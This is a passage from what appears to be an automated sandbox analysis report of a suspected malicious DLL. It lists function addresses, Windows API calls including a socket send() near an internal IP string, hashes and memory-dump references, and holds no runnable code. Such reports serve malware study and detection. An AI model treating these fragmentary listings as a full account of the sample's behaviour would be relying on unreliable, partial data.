                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Value$Thread__decode_pointer$CurrentErrorExitLast___set_flsgetvalue__freefls@4_doexit
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2731880238-0
                                                                                                                                  • Opcode ID: ae3910c06ee5840ca0e9954760db7c1db5c6932cf2e7a7bf95a1dcd3ebd7d57f
                                                                                                                                  • Instruction ID: 3ca39206478dd66d9189836c3fdd0f1ffde406c57308cf63c3fc949a3eb6cb77
                                                                                                                                  • Opcode Fuzzy Hash: ae3910c06ee5840ca0e9954760db7c1db5c6932cf2e7a7bf95a1dcd3ebd7d57f
                                                                                                                                  • Instruction Fuzzy Hash: 9F015E784046519FDB06EBA1DE4594E7BA9EF48243F208458E905CF232DB35E841CB52
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10012890 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 100134C0: GetSystemMenu.USER32 ref: 100134D2
                                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 1001295E
                                                                                                                                  • SetWindowLongA.USER32 ref: 10012989
                                                                                                                                    • Part of subcall function 10013460: AppendMenuA.USER32(?,00000000,00000065,00000000), ref: 1001347A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LongMenuWindow$AppendSystem
                                                                                                                                  • String ID: 192.168.3.85$Message
                                                                                                                                  • API String ID: 4121476972-856608562
                                                                                                                                  • Opcode ID: 3a485f645eb87c5dda0d91dee484213725162975b6f285bf4b629bdff528d801
                                                                                                                                  • Instruction ID: 340d0da2b4c657a0b825359f55c53a9166b08011863532f0c2811cf24d97780a
                                                                                                                                  • Opcode Fuzzy Hash: 3a485f645eb87c5dda0d91dee484213725162975b6f285bf4b629bdff528d801
                                                                                                                                  • Instruction Fuzzy Hash: F2411B74A4020A9BDB04DB94CCA2FBFB771EF44714F108228F5226F2D2DB75A945CB54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10013010 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108memorynetworkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
                                                                                                                                    • Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9
                                                                                                                                    • Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03
                                                                                                                                  • _DebugHeapAllocator.LIBCPMTD ref: 100130B2
                                                                                                                                    • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                                  • _strcat.LIBCMT ref: 1001310A
                                                                                                                                    • Part of subcall function 100137A0: SendMessageA.USER32 ref: 100137BB
                                                                                                                                  • send.WS2_32(?,?,00000064,00000000), ref: 10013195
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocatorDebugHeapWindow$H_prolog3MessageSendText_strcatsend
                                                                                                                                  • String ID: :
                                                                                                                                  • API String ID: 16450322-3653984579
                                                                                                                                  • Opcode ID: 13b8f6eccedc4ccdf4080b13ffaaa0417b73d22118cf8ccc7af144c890aa7e78
                                                                                                                                  • Instruction ID: f6b77999ec19404b7b7ce6cfec7bf3295ff1974a42ab232d1976716b8ec2d843
                                                                                                                                  • Opcode Fuzzy Hash: 13b8f6eccedc4ccdf4080b13ffaaa0417b73d22118cf8ccc7af144c890aa7e78
                                                                                                                                  • Instruction Fuzzy Hash: 01410DB59001189FDB24DB64CC91BEEB775FF44304F5082ADE51AA7282DF346A85CF54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1001C1A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
                                                                                                                                    • Part of subcall function 10020E5D: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
                                                                                                                                    • Part of subcall function 10020E5D: LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
                                                                                                                                    • Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1
                                                                                                                                    • Part of subcall function 1002072F: __EH_prolog3_catch.LIBCMT ref: 10020736
                                                                                                                                    • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,HtmlHelpA,Function_0001B602,0000000C), ref: 1001C1E4
                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 1001C1F4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                                                                  • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                                                  • API String ID: 3274081130-63838506
                                                                                                                                  • Opcode ID: c4ff01ed609920668b45cb7a661f9e4cbf771a6b1ff00103ddf750d8f10613a5
                                                                                                                                  • Instruction ID: 160066d18b9ed5655b72b10460cb3280c451ea5be833735a295996cf30cd07f4
                                                                                                                                  • Opcode Fuzzy Hash: c4ff01ed609920668b45cb7a661f9e4cbf771a6b1ff00103ddf750d8f10613a5
                                                                                                                                  • Instruction Fuzzy Hash: AB01F431044706EFE721DFA0AE06F4B7AD5FF04B42F114819F48B98452D770E890AA26
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1003CB01 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(KERNEL32,10033B0B), ref: 1003CB06
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1003CB16
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                  • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                  • API String ID: 1646373207-3105848591
                                                                                                                                  • Opcode ID: dc24b012ca1fb4bb896a1dc56100cb90a959cbbb7befe9f8aa549c159bb80eea
                                                                                                                                  • Instruction ID: 56947a08a2dfe052dc663468ef672e03bc5ef0643ca607e86d2238c745675855
                                                                                                                                  • Opcode Fuzzy Hash: dc24b012ca1fb4bb896a1dc56100cb90a959cbbb7befe9f8aa549c159bb80eea
                                                                                                                                  • Instruction Fuzzy Hash: EDF0362090091DE6EF01AFA1AD4969F7A74FB45747F510594E592F0094EF7081B49356
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 100026D0 Relevance: 6.4, APIs: 5, Instructions: 118COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetLastError.KERNEL32(0000007F), ref: 100026FF
                                                                                                                                  • SetLastError.KERNEL32(0000007F), ref: 1000272B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                  • Opcode ID: c9d272d6c554433b4f74cd5ef5cb02bf0863a661864ac41ad17d6d3c26d06b94
                                                                                                                                  • Instruction ID: 8e64829365f1e03862022e03b3a1730166a9b8a5af119672a2ae158ec68dc0e1
                                                                                                                                  • Opcode Fuzzy Hash: c9d272d6c554433b4f74cd5ef5cb02bf0863a661864ac41ad17d6d3c26d06b94
                                                                                                                                  • Instruction Fuzzy Hash: 15511774E0411AEFEB04CF94C980AAEB7F1FF48344F208568E819AB345D774EA41DB91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10028638 Relevance: 6.3, APIs: 4, Instructions: 309memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Task$AllocFreeH_prolog3_malloc_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2459298410-0
                                                                                                                                  • Opcode ID: 56213c16b803c0e3796c36805e348e495a167a55b28ccf8aaf43ce70b74c7790
                                                                                                                                  • Instruction ID: 01fa38cd0bce2764ee9a58647bdb5924a3a29805fe2f500651f730ac49990a2b
                                                                                                                                  • Opcode Fuzzy Hash: 56213c16b803c0e3796c36805e348e495a167a55b28ccf8aaf43ce70b74c7790
                                                                                                                                  • Instruction Fuzzy Hash: A9C14878601709EFCB14CF68D884AAEB7F5FF88304B648919F856CB291DB71EA41CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 100294E4 Relevance: 6.2, APIs: 4, Instructions: 186COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeTask$ClearH_prolog3Variant
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 365290523-0
                                                                                                                                  • Opcode ID: f4bb32272e54c4630c0f1c2b8213bbcb586b41b40c6f53f6c8fe32820d3a87b6
                                                                                                                                  • Instruction ID: 6dfbb0beff937a9ff07d9f1090c18b3058f0abcc9665a1e5acd726f5cd97e7a7
                                                                                                                                  • Opcode Fuzzy Hash: f4bb32272e54c4630c0f1c2b8213bbcb586b41b40c6f53f6c8fe32820d3a87b6
                                                                                                                                  • Instruction Fuzzy Hash: 6D711775A00A52CFCB60CFA4D9D892AB7F5FF483447A1086DE1469B661CB31EC84CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1002910E Relevance: 6.2, APIs: 4, Instructions: 173windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Rect$DesktopVisible
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1055025324-0
                                                                                                                                  • Opcode ID: 935237afc4adc895a68147513c1bf8892873bb4cd96f085db3d98f84c1cebb7e
                                                                                                                                  • Instruction ID: 30a46d7291c636a93fdcae379f64361bdaca7d323e8f19b7ddc13159497105e4
                                                                                                                                  • Opcode Fuzzy Hash: 935237afc4adc895a68147513c1bf8892873bb4cd96f085db3d98f84c1cebb7e
                                                                                                                                  • Instruction Fuzzy Hash: 0751E875A0051AEFCB04EFA8DD84CAEB7B9FF48244B614458F515EB255C731EE44CB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1002C6D0 Relevance: 6.1, APIs: 4, Instructions: 132timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 1002C6E7
                                                                                                                                    • Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA
                                                                                                                                  • GetFileTime.KERNEL32(?,?,?,?), ref: 1002C71E
                                                                                                                                  • GetFileSize.KERNEL32(?,00000000), ref: 1002C733
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$SizeTime_memset_wctomb_s
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 26245289-0
                                                                                                                                  • Opcode ID: 7b2a999f3c33549589a606ce6b98c8e8e242c4bbabb886e5bb6986c1362b8808
                                                                                                                                  • Instruction ID: d07d59a7ff7176791715ff84f3171322556d45097dda904751fff30d64e08997
                                                                                                                                  • Opcode Fuzzy Hash: 7b2a999f3c33549589a606ce6b98c8e8e242c4bbabb886e5bb6986c1362b8808
                                                                                                                                  • Instruction Fuzzy Hash: 32411B755046199FC724DFA8D981C9AB7F8FF093A07508A2EE5A6D3690E730F944CF50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1001E262 Relevance: 6.1, APIs: 4, Instructions: 103windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                  • Opcode ID: 19518e3b86100b37808dce19ac351571687518489287765c305fecf2a5902a3e
                                                                                                                                  • Instruction ID: f22ebcd49f6c4bcf1cb84aabd9b6e0a9805a11e2c96a6edef58545e6592a584a
                                                                                                                                  • Opcode Fuzzy Hash: 19518e3b86100b37808dce19ac351571687518489287765c305fecf2a5902a3e
                                                                                                                                  • Instruction Fuzzy Hash: 05318F70500259FFDB15DF51C889EAE7BA9EF05790F10806AF90A8F251DA30EEC0DBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1003E161 Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1003E191
                                                                                                                                  • __isleadbyte_l.LIBCMT ref: 1003E1C5
                                                                                                                                  • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E1F6
                                                                                                                                  • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E264
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3058430110-0
                                                                                                                                  • Opcode ID: a45d194493aaf76ac1cbb866e4ff6e90a1da533cdec724975968ec5ddac79853
                                                                                                                                  • Instruction ID: 9e7ca2975dce83e2c1685c00030f8d0177b945f551d5a1751bafc6038c684fbd
                                                                                                                                  • Opcode Fuzzy Hash: a45d194493aaf76ac1cbb866e4ff6e90a1da533cdec724975968ec5ddac79853
                                                                                                                                  • Instruction Fuzzy Hash: 23317C31A00296EFDB12CFA4CC849AA7BE9FF05352F168669E8608F1D1D330AD40DB51
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10026509 Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 10026510
                                                                                                                                    • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                  • GetDC.USER32(?), ref: 1002658E
                                                                                                                                  • IntersectRect.USER32(?,?,?), ref: 100265C8
                                                                                                                                  • CreateRectRgnIndirect.GDI32(?), ref: 100265D2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Rect$CreateException@8H_prolog3IndirectIntersectThrow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3511876931-0
                                                                                                                                  • Opcode ID: 7f6c9fa0e8688ea19043668f2c8dfda2f995fd9ab5cfcbe19950409bb8c584bc
                                                                                                                                  • Instruction ID: 5a52d3282697d26d7181906baa499751bc8b7848460d4ff7fbcd99527b494316
                                                                                                                                  • Opcode Fuzzy Hash: 7f6c9fa0e8688ea19043668f2c8dfda2f995fd9ab5cfcbe19950409bb8c584bc
                                                                                                                                  • Instruction Fuzzy Hash: 71315D71D0062ADFCF01CFA4C989ADEBBB5FF08300F614459F915AB155D774AA81CBA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 100211EE Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __msize_malloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1288803200-0
                                                                                                                                  • Opcode ID: 172559e824c18d3cfeedd4486189817d6fbc1f914f9a457cc390fc68d8836e76
                                                                                                                                  • Instruction ID: b47b26af396fa43851c5e16859074de777cbaf7baa699ca6a99f78ce61545289
                                                                                                                                  • Opcode Fuzzy Hash: 172559e824c18d3cfeedd4486189817d6fbc1f914f9a457cc390fc68d8836e76
                                                                                                                                  • Instruction Fuzzy Hash: 0921C138100210DFCB59DF64F881AEE77D5EF20690B908629F858CA246DB34ECA4CB80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1002EB37 Relevance: 6.1, APIs: 4, Instructions: 85windowCOMMON
                                                                                                                                  Download Yara Rule
